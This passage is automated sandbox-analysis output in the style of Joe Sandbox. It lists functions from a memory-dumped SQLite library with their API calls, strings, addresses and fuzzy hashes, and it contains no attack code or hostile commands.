                                                    Function 61E36CCB Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_vmprintf.SQLITE3 ref: 61E36CE4
                                                      • Part of subcall function 61E34CFC: sqlite3_initialize.SQLITE3 ref: 61E34D02
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E36D02
                                                      • Part of subcall function 61E3579B: sqlite3_initialize.SQLITE3 ref: 61E357A1
                                                      • Part of subcall function 61E3579B: sqlite3_vmprintf.SQLITE3 ref: 61E357BB
                                                    • sqlite3_free.SQLITE3 ref: 61E36D0E
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_free.SQLITE3 ref: 61E36D16
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_vmprintf$sqlite3_mprintfsqlite3_mutex_enter
                                                    • String ID:
                                                    • API String ID: 2126213637-0
                                                    • Opcode ID: efb1ab0180326778d7e281a968a555ec171b9f5cbc6a02f9d9f89af30277a723
                                                    • Instruction ID: 2e125b45ca13e8164c6cfc61d4b3d34040d88ad69d7e0db98b45a3f5c638f842
                                                    • Opcode Fuzzy Hash: efb1ab0180326778d7e281a968a555ec171b9f5cbc6a02f9d9f89af30277a723
                                                    • Instruction Fuzzy Hash: 61F03071A087659B9700AFAD848555EBBE8EFC8664F65882EEC88C7300E770C940CB92
                                                    Function 61E37BC5 Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_value_pointer.SQLITE3 ref: 61E37BDC
                                                      • Part of subcall function 61E0E51C: strcmp.MSVCRT ref: 61E0E54A
                                                    • sqlite3_mprintf.SQLITE3 ref: 61E37BF5
                                                      • Part of subcall function 61E3579B: sqlite3_initialize.SQLITE3 ref: 61E357A1
                                                      • Part of subcall function 61E3579B: sqlite3_vmprintf.SQLITE3 ref: 61E357BB
                                                    • sqlite3_result_error.SQLITE3 ref: 61E37C0B
                                                    • sqlite3_free.SQLITE3 ref: 61E37C13
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_mutex_entersqlite3_result_errorsqlite3_value_pointersqlite3_vmprintfstrcmp
                                                    • String ID:
                                                    • API String ID: 2416658597-0
                                                    • Opcode ID: 593bde18ef76df953ac5661e13cbf1c49701da005f7ac7f34023a180bc0b0744
                                                    • Instruction ID: af64c5a3c92e61f27df286f9c60c50e29ba39843bc2651d23dbe9b96fb81afab
                                                    • Opcode Fuzzy Hash: 593bde18ef76df953ac5661e13cbf1c49701da005f7ac7f34023a180bc0b0744
                                                    • Instruction Fuzzy Hash: B5F054B050D7119BC3107FA9848151ABBE8EF89764F24CD6CE49CCB341E331C4919B42
                                                    Function 61E8888C Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_initialize.SQLITE3 ref: 61E88893
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                      • Part of subcall function 61E17D9D: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                      • Part of subcall function 61E17D9D: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E888AB
                                                    • sqlite3_free.SQLITE3 ref: 61E888B8
                                                      • Part of subcall function 61E09B91: sqlite3_mutex_enter.SQLITE3 ref: 61E09BB0
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E888D4
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_enter$sqlite3_mutex_leave$sqlite3_configsqlite3_freesqlite3_initialize
                                                    • String ID:
                                                    • API String ID: 3512769177-0
                                                    • Opcode ID: 0b37f2ec72fe9e69ee4bb7ac37354f3c7325912ed5349237aeeac3de8c17fd2e
                                                    • Instruction ID: 4b6fe121f559167ec4ef95b3a77e7ee9380c97b312a764534a8b42931508ffaa
                                                    • Opcode Fuzzy Hash: 0b37f2ec72fe9e69ee4bb7ac37354f3c7325912ed5349237aeeac3de8c17fd2e
                                                    • Instruction Fuzzy Hash: 6AE04FB0518B4A8BDB007FFAD485319B7E8BB4330DF95492DD9898B301E735C4A09B62
                                                    Function 61E06F40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_strnicmp
                                                    • String ID: '$null
                                                    • API String ID: 1961171630-2611297978
                                                    • Opcode ID: 4915e0317345a2fec89210722418c639ac592a62e769f9dae064e8f4d44adc95
                                                    • Instruction ID: 119816925cc4f9c2b42e67d083debc9352ddc86815b2ff80b258f418b1e40946
                                                    • Opcode Fuzzy Hash: 4915e0317345a2fec89210722418c639ac592a62e769f9dae064e8f4d44adc95
                                                    • Instruction Fuzzy Hash: AE312964E491864EF701CDB4C465391BBD3AB8A30BFF8D36CC5C44A2CAE23AD8E94341
                                                    Function 61E26E43 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E26E7D
                                                      • Part of subcall function 61E17701: InterlockedCompareExchange.KERNEL32 ref: 61E17721
                                                      • Part of subcall function 61E17701: InterlockedCompareExchange.KERNEL32 ref: 61E17768
                                                      • Part of subcall function 61E17701: InterlockedCompareExchange.KERNEL32 ref: 61E17788
                                                      • Part of subcall function 61E1768B: sqlite3_win32_sleep.SQLITE3 ref: 61E176E3
                                                    • sqlite3_free.SQLITE3 ref: 61E26F48
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                    • String ID: winDelete
                                                    • API String ID: 3336177498-3936022152
                                                    • Opcode ID: be36d6db39c3b5ba1a7ee0445776ab7a307389d17740f8c0a9672ded830e6cc9
                                                    • Instruction ID: 153c4c0713fb4d17254f0be0e11834e24d8c0f092806fb1a5de6b0f5bc0ce4c1
                                                    • Opcode Fuzzy Hash: be36d6db39c3b5ba1a7ee0445776ab7a307389d17740f8c0a9672ded830e6cc9
                                                    • Instruction Fuzzy Hash: 17319170A0469A8BEF015FA5C4A069E77B4EF8E718F60C629FC5197384D738D9828B52
                                                    Function 61E5D6E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 3
                                                    • API String ID: 0-1842515611
                                                    • Opcode ID: c359f8b81d68eb8c9f7ae1edab7660c1e8a7c51962e241991ea287fe3aa8b880
                                                    • Instruction ID: 8817a0866705175885a710439bbd4836f620ae11ce378b682b2c1ac3b741db12
                                                    • Opcode Fuzzy Hash: c359f8b81d68eb8c9f7ae1edab7660c1e8a7c51962e241991ea287fe3aa8b880
                                                    • Instruction Fuzzy Hash: FA31BE78A042558FEB918F64C4C0789BBF1BF45328F2881A9DD589B346D335E991CF92
                                                    Function 61E89CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: Virtual$ProtectQuery
                                                    • String ID: @
                                                    • API String ID: 1027372294-2766056989
                                                    • Opcode ID: 68ef9edf323589f895f67eb294aaeaa364d5fa48cf3b872ae2af3e2badbed1b5
                                                    • Instruction ID: 6897677ba175805eef62a58521b70793c343af48df22e6b21b0e6597144c718b
                                                    • Opcode Fuzzy Hash: 68ef9edf323589f895f67eb294aaeaa364d5fa48cf3b872ae2af3e2badbed1b5
                                                    • Instruction Fuzzy Hash: 85316DB2905B028FE790DF69C48461ABBE0FBC5354F55C91DD95D97340E734E884CB91
                                                    Function 61E5E519 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_exec.SQLITE3(?,?,?,?,?,61E5E83A), ref: 61E5E5B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_exec
                                                    • String ID: 9&a$sqlite_stat1
                                                    • API String ID: 2141490097-15788650
                                                    • Opcode ID: 4a0e5da4288da6d35be70e32a0061fee6ce949551c033239e873b51cf4a9ec24
                                                    • Instruction ID: 376e2e6fa9c1220bfe13d65ee9552f892fc783fbf2521727bac6187e7dfc5923
                                                    • Opcode Fuzzy Hash: 4a0e5da4288da6d35be70e32a0061fee6ce949551c033239e873b51cf4a9ec24
                                                    • Instruction Fuzzy Hash: 3D215CB1A047029FD740CF6AC480A1AFBF0BF88258F25C56DE858DB391E735E821CB91
                                                    Function 61E03D57 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_stricmp.SQLITE3(00000000,?,?,61E5E56C), ref: 61E03DD1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_stricmp
                                                    • String ID: sqlite_master$sqlite_temp_master
                                                    • API String ID: 912767213-3047539776
                                                    • Opcode ID: a988c5acb42c6b431b114348884e4b5206804e472cbcaf0d9f3f89d42eb742e6
                                                    • Instruction ID: 42914314482c5c7be0334dfd1ceba6cec5b62f496014fc4bcda36ba78da05ce0
                                                    • Opcode Fuzzy Hash: a988c5acb42c6b431b114348884e4b5206804e472cbcaf0d9f3f89d42eb742e6
                                                    • Instruction Fuzzy Hash: DD118275B042168FAB00DFADC880A5BBBF4FF84219B258466DC24DB305D370D92287A1
                                                    Function 61E1EC13 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E1EC2C
                                                    • sqlite3_value_numeric_type.SQLITE3 ref: 61E1EC38
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                    • String ID:
                                                    • API String ID: 3265351223-3916222277
                                                    • Opcode ID: 034ccde8151b4e158b1c14126d3aa0e2df06ac6c5da64a2a741d60d68d2e3c5b
                                                    • Instruction ID: b9349483fea1c0add4c2fde2e21c29d77ba5761b23afb17a80a5ad6ef4537e8f
                                                    • Opcode Fuzzy Hash: 034ccde8151b4e158b1c14126d3aa0e2df06ac6c5da64a2a741d60d68d2e3c5b
                                                    • Instruction Fuzzy Hash: 30116530508B858BDF099FA9C4C625A7FF4FF59308F208498E8948B34AD771D9A0C7D2
                                                    Function 61E26122 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E26167
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E261A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: La
                                                    • API String ID: 1477753154-3337869896
                                                    • Opcode ID: 2db8a55825a691025075a65482ebd4321c2b9e76b21dcb118d6e57c5f676dc6d
                                                    • Instruction ID: 2e6fe5fe5d67c3e5516109a2096a260fe30d01f85ffdc43b6059f058c8211ff7
                                                    • Opcode Fuzzy Hash: 2db8a55825a691025075a65482ebd4321c2b9e76b21dcb118d6e57c5f676dc6d
                                                    • Instruction Fuzzy Hash: 5311C0B5A007449BDB00DF9AE48065EBBB0FB8B329F14852AD9085B340E335E891CBD1